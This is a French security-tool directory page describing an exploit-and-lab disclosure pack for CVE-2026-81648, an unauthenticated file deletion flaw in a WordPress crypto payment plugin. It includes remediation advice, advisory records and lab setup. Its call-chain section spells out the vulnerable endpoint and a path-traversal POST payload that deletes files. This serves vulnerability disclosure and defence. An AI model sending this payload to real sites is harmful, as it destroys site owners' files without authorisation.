Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-81648 — Preuve de concept d'exploit et labo pour CVE-2026-81648, une faille de suppression arbitraire de fichiers sans authentification dans le plugin WordPress CryptoPayment Gateway. | Kitploit
Outils/GitHubGitHub/abraxas/cve-2026-81648
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebVirtualisation de SécuritéSécurité WebTests d'IntrusionLabs et Pratique
GitHubabraxas/cve-2026-81648

CVE-2026-81648

Preuve de concept d'exploit et labo pour CVE-2026-81648, une faille de suppression arbitraire de fichiers sans authentification dans le plugin WordPress CryptoPayment Gateway.

il y a 1 jourPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Abraxas Labs — CVE-2026-81648 — WordPress

abraxaslabs.tech  ·  github.com/abraxas  ·  @abraxas_null  ·  CVE-2026-81648

CVE-2026-81648 — WordPress

WordPress — CryptoPayment Gateway 1.2.2 — Granwill

Le plugin WordPress CryptoPayment Gateway, de la version 1.2.1 à 1.2.2, n'applique pas de contrôle d'autorisation sur l'un de ses points de terminaison AJAX, ce qui permet à des utilisateurs non authentifiés d'invoquer des opérations administratives, notamment la suppression de fichiers arbitraires sur le serveur, l'écrasement de la configuration de la passerelle de paiement et la récupération en clair des identifiants de portefeuille stockés.

CVECVE-2026-81648 · CVE.org
CWECWE-862
CVSSCritique : 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProduitWordPress — CryptoPayment Gateway
Affecté1.2.1–1.2.2
Corrigéaucun correctif public (WPScan : aucun correctif connu)
Authaucune (voir la cartographie du code source)
LicenceGNU Affero GPL v3.0
Lab127.0.0.1 uniquement · pack de divulgation fournisseur/client, pas un scanner

Avis (issu de la cartographie du code source)

delete-file sur cryptd/ajax.php est le point de convergence. Le HTTP correspond à ce fichier PHP, pas à admin-ajax.php.


Point d'entrée

  • Méthode : POST
  • Chemin : /wp-content/plugins/cryptopayment-gateway/vendor/cryptd/ajax.php
  • Routeur : POST direct vendor/cryptd/ajax.php function=delete-file. Pas wp_ajax. Le chemin est DIR/uploads/ + folder + file_name (5 .. depuis uploads atteint wp-content).
  • Notes : CVE-2026-81648 CWE-862 CryptoPayment Gateway 1.2.2. Témoin POCWitness81648 disparaissant. Aucun correctif fournisseur connu (WPScan). Ne pas récupérer les clés de portefeuille.

Chaîne d'appels

  • GET /wp-content/poc81648/index.php expect POCWitness81648
  • POST ajax.php data={"function":"delete-file","file_name":"../../../../../poc81648/index.php","folder":""}
  • crpay_file_delete unlinks wp-content/poc81648/index.php
  • GET witness URL no POCWitness81648

Prérequis du lab

  • CryptoPayment Gateway 1.2.2
  • wp-content/poc81648/index.php renvoie POCWitness81648

Témoin

POCWitness81648 présent avant le POST, absent après. Un JSON de succès sans la suppression ne compte pas.

Échec

  • JSON ajax sans disparition du fichier
  • POCWitness81648 toujours servi
  • suppression de wp-config.php
  • extraction des clés de portefeuille
  • reverse shell

Correctif / remédiation

À faire en premier : Il n'existe aucun correctif public. Désactivez CryptoPayment Gateway ou bloquez vendor/cryptd/ajax.php jusqu'à la publication d'une version par le fournisseur.

Vérifier après la mise à jour

  • Relancez CVE-2026-81648-Abraxas-Labs.py contre la version corrigée : le témoin cartographié ne doit pas apparaître.
  • Confirmez l'avis fournisseur / le changeset dans l'arborescence déployée (voir les références).
  • Une signature WAF est un délai, pas un correctif.

Si vous ne pouvez pas mettre à jour immédiatement

  • Désactivez ou isolez le composant affecté.
  • Recherchez la condition témoin en production (nouveaux utilisateurs privilégiés, fichiers inattendus, lignes injectées — tout ce que nomme la cartographie de cette CVE).

Reproduction (lab autorisé)

Ciblez uniquement http://127.0.0.1:8088 (ou la boucle locale que vous avez liée). Ne pointez pas ce script vers Internet.

root@kitploit:~
python3 CVE-2026-81648-Abraxas-Labs.py

Le succès correspond au témoin ci-dessus dans le corps de la réponse. Un HTML 200 générique ne compte pas.


Images du lab

Pile en boucle locale utilisée pour la reproduction. Images officielles sauf si un Dockerfile de ce dossier construit depuis les sources.

  • lab/docker-compose.yml
  • lab/docker-compose.override.yml
  • lab/Dockerfile
root@kitploit:~
cd lab
docker compose up --force-recreate

Liez l'arborescence du produit vulnérable à côté de Compose si le YAML monte un répertoire local (zip du plugin / tag source issu du tableau des versions). Ne publiez rien d'autre que 127.0.0.1.


Références

  • CVE-2026-81648 · NVD

  • CVE-2026-81648 · CVE.org

  • wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/

  • github.com/advisories/GHSA-9r3q-6qw8-8pm7

  • nvd.nist.gov/vuln/detail/CVE-2026-81648

  • wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898

  • Répertoire de plugins : cryptopayment-gateway

  • Navigateur Trac : plugins.trac.wordpress.org/cryptopayment-gateway

  • Tags SVN : plugins.svn.wordpress.org/cryptopayment-gateway

  • Abraxas Labs : abraxaslabs.tech · github.com/abraxas · @abraxas_null


Enregistrements (structurés)

root@kitploit:~
# CVE-2026-81648  (structured records)

- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-81648`
- CWE: CWE-862
- published: 2026-09-13T21:17:01.930

## NVD description

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

## MITRE description

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

## Affected

- Unknown CryptoPayment Gateway 1.2.1 affected

## References (JSON sources only)

- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/
- https://github.com/advisories/GHSA-9r3q-6qw8-8pm7
- https://nvd.nist.gov/vuln/detail/CVE-2026-81648
- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898

## GitHub advisory

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization...

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

Licence

Ce pack de divulgation est sous licence GNU Affero General Public License v3.0. Voir LICENSE.


Avertissement

Ce pack est destiné au fournisseur, au propriétaire du site et aux labs autorisés. Le script communique avec 127.0.0.1. Son utilisation contre des systèmes que vous ne possédez pas n'est pas autorisée par Abraxas Labs. Aucune garantie.

abraxaslabs.tech · github.com/abraxas · @abraxas_null

Télécharger l’outil